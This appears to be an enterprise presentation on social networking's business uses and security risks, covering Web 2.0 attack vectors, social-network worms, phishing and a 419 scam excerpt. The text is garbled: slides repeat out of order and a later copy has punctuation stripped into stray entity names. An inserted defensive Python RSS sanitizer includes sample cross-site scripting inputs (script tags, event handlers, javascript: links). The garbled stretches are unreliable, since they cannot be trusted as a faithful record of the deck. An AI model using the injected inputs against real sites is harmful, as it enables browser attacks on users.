• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)
• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443, indistinguishable by port from the rest of Web traffic
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
What is next in the world of social networking
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million (source: eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social Networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices: for example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." – Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go." – Biz Stone, co-founder of Twitter
Q&A
Today's Presenters
Nelson Gibbs
Senior Manager, AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix
• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist, "A special report on social networking", January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008), Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Wall of Facebook: The Social Network's Plan to Dominate the Internet – and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site: http://www.bcs.org/socialmedia
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
What makes a Social Network so powerful (cont.)
• Applying Metcalfe's law to Social Networking: consider LinkedIn. It took 16 months to reach the first one million users; the latest million users were added in just 11 days

What makes a Social Network so powerful (cont.)
• Web 2.0
  – "Web 2.0" was first coined in 1999 and by 2004 had come to describe the next evolution of the Web
  – It's based on the notion that people who consume media, access the Internet and use the Web shouldn't passively absorb the flow of content from provider to viewer; rather, they should be active contributors, helping customize media and technology for their own purposes
  – Social network sites, blogs, wikis and other collaborative technologies are the result

Web 1.0 (Yesterday): power lies with institutions, platforms and technology
• Structured
• Siloed
• One size fits all
• Passive audience
• Unilateral

Web 2.0 (Today): power lies with users, communities and experiences
• Flexible
• Collaborative
• Communities
• Engaged users
• Multilateral

Social network — More terminology
Social network analysis
• Mapping and measuring of relationships and flows among people, groups, organizations, computers or other information/knowledge-processing entities
• The nodes in the network are the people and groups, while the links show relationships or flows between the nodes
• Provides both a visual and a mathematical analysis of human relationships
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are using social networking
www.isaca.org 19

Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 20

Statistics on companies using Social Networking (cont.)
Same data set and source as the previous slide.
www.isaca.org 21
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
www.isaca.org 22
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system, allowing a company's intellectual assets to be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
www.isaca.org 23
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies
  http://redcrosschat.org
www.isaca.org 24
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 25
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
www.isaca.org 26
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees.
  https://mix.blueshirtnation.com
www.isaca.org 27
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
www.isaca.org 28
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving.
  http://realwomenrealadvice.com
www.isaca.org 30

Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum: an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs.
  http://www.openforum.com
www.isaca.org 31

Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on its Web site. Allows the users to discuss previous audit findings.
  http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32

Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books.
  http://www.shelfari.com
www.isaca.org 33

Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest updates.
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
  • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
  • There are now more than 500,000 active applications on the Facebook Platform

Rank | Name | Monthly Active Users
--- | --- | ---
1 | FarmVille | 82,580,911
2 | Static FBML | 46,827,021
3 | Birthday Cards | 41,904,049
4 | Café World | 30,032,716
5 | Facebook for iPhone | 29,438,848
6 | Texas HoldEm Poker | 28,332,917
7 | Slide FunSpace | 25,630,033
8 | Happy Aquarium (BETA) | 24,915,971
9 | Mafia Wars | 24,704,179
10 | Causes | 24,317,292

www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors — a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS") in AJAX, e.g. the "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning — poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — JavaScript injected into RSS feeds to generate an attack on the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — failure to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP messages — bypass of authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
www.isaca.org 37
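The RSS/Atom injection vector above targets the mashup that renders feed content, so the defence is to sanitize item bodies on the server before they reach any browser. The following is an added example (not code from the slides or from the net-square paper), using only the Python standard library: it parses a constructed RSS 2.0 sample and strips script blocks, event-handler attributes and javascript: URLs from item descriptions, keeping an allowlist of inert tags.

```python
"""Sanitize RSS item bodies before a mashup renders them (added example).

Standard library only. SAMPLE_RSS is constructed for the demonstration.
"""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: one benign item and one carrying the kind of injected
# active content the "RSS/Atom injection" vector describes.
SAMPLE_RSS = """<rss version="2.0"><channel><title>constructed feed</title>
<item><title>Benign</title>
<description>&lt;p&gt;Read &lt;a href="https://example.org/post"&gt;more&lt;/a&gt;&lt;/p&gt;</description>
</item>
<item><title>Injected</title>
<description>&lt;p onmouseover="alert(1)"&gt;hi&lt;/p&gt;&lt;script&gt;steal()&lt;/script&gt;&lt;a href="javascript:alert(2)"&gt;x&lt;/a&gt;&lt;img src=x onerror="alert(3)"&gt;</description>
</item>
</channel></rss>"""

MAX_FEED_BYTES = 1_000_000          # cheap guard against oversized / entity-expansion payloads
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br", "img"}
URL_ATTRS = {"a": "href", "img": "src"}   # the only attributes ever kept
SAFE_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}


class _Sanitizer(HTMLParser):
    """Re-emit an HTML fragment keeping only allowlisted tags and safe URLs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0   # > 0 while inside <script>/<style>: content is discarded

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return
        url_attr = URL_ATTRS.get(tag)
        kept = ""
        for name, value in attrs:
            # Keep href/src only with an http(s) scheme; every other attribute
            # (on* handlers, style, formaction, ...) is dropped.
            if name == url_attr and value:
                value = value.strip()
                if urlsplit(value).scheme.lower() in SAFE_SCHEMES:
                    kept = f' {name}="{html.escape(value, quote=True)}"'
        if tag == "img" and not kept:
            return   # an <img> without a safe src has no legitimate use
        self.out.append(f"<{tag}{kept}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if self._drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(html.escape(data, quote=False))   # text is re-escaped


def sanitize_html(fragment: str) -> str:
    """Return `fragment` with active content removed and text re-escaped."""
    parser = _Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_feed(rss_xml: str) -> list:
    """Parse an RSS 2.0 document and return its items with sanitized bodies.

    The size cap is only a first line of defence against "XML poisoning"
    payloads; for untrusted feeds in production also use a hardened XML
    parser such as defusedxml.
    """
    if len(rss_xml.encode("utf-8")) > MAX_FEED_BYTES:
        raise ValueError("feed too large")
    root = ET.fromstring(rss_xml)
    items = []
    for item in root.iter("item"):
        title = (item.findtext("title") or "").strip()
        body = item.findtext("description") or ""
        items.append({"title": html.escape(title), "description": sanitize_html(body)})
    return items


if __name__ == "__main__":
    for entry in sanitize_feed(SAMPLE_RSS):
        print(entry["title"], "->", entry["description"])
```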
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
www.isaca.org 38

Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other
www.isaca.org 39
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• These attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com etc.
www.isaca.org 40
Risks and challenges (cont.)
• More on phishing — social networks are a target rich environment
www.isaca.org 41

Risks and challenges (cont.)
• More on phishing — social networks are a target rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady. Now I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School: my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year………"
– See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org 42
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" — Gartner
www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1,000 times." – Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  Or alternatively
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
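As an added rendering, not from the slides, the quoted statement of Beckstrom's law in formula form; the symbol names are my own labels for the quantities the quote names (per-user net transaction value, summed over all users), with the discounting the law applies to transactions occurring at different times:

$$V_j = \sum_{i=1}^{n} V_{i,j}, \qquad V_{i,j} = \sum_{k=1}^{m} \frac{B_{i,j,k} - C_{i,j,k}}{(1 + r_k)^{t_k}}$$

Here $V_{i,j}$ is the value of network $j$ to user $i$, $B_{i,j,k}$ and $C_{i,j,k}$ are the benefit and cost to user $i$ of transaction $k$ conducted over network $j$, and $r_k$ and $t_k$ are the discount rate and time of that transaction. Unlike the Metcalfe $n^2$ rule quoted earlier in the deck, a user who conducts no net-positive transactions adds nothing to $V_j$, which is exactly what makes the benefit hard to quantify: $B$ and $C$ have to be measured per transaction.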
Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
  • Details how social networking sites and applications can be used
  • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
  • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality:
  • Identify applications regardless of port, protocol, evasive tactic or SSL
  • Identify users regardless of IP address
  • Scan application content in real time
  • Visibility and policy control over application access
www.isaca.org 53
What is next in the world of social networking
www.isaca.org 54

Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% on the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friends' location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go" — Biz Stone, Co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58

Today's Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
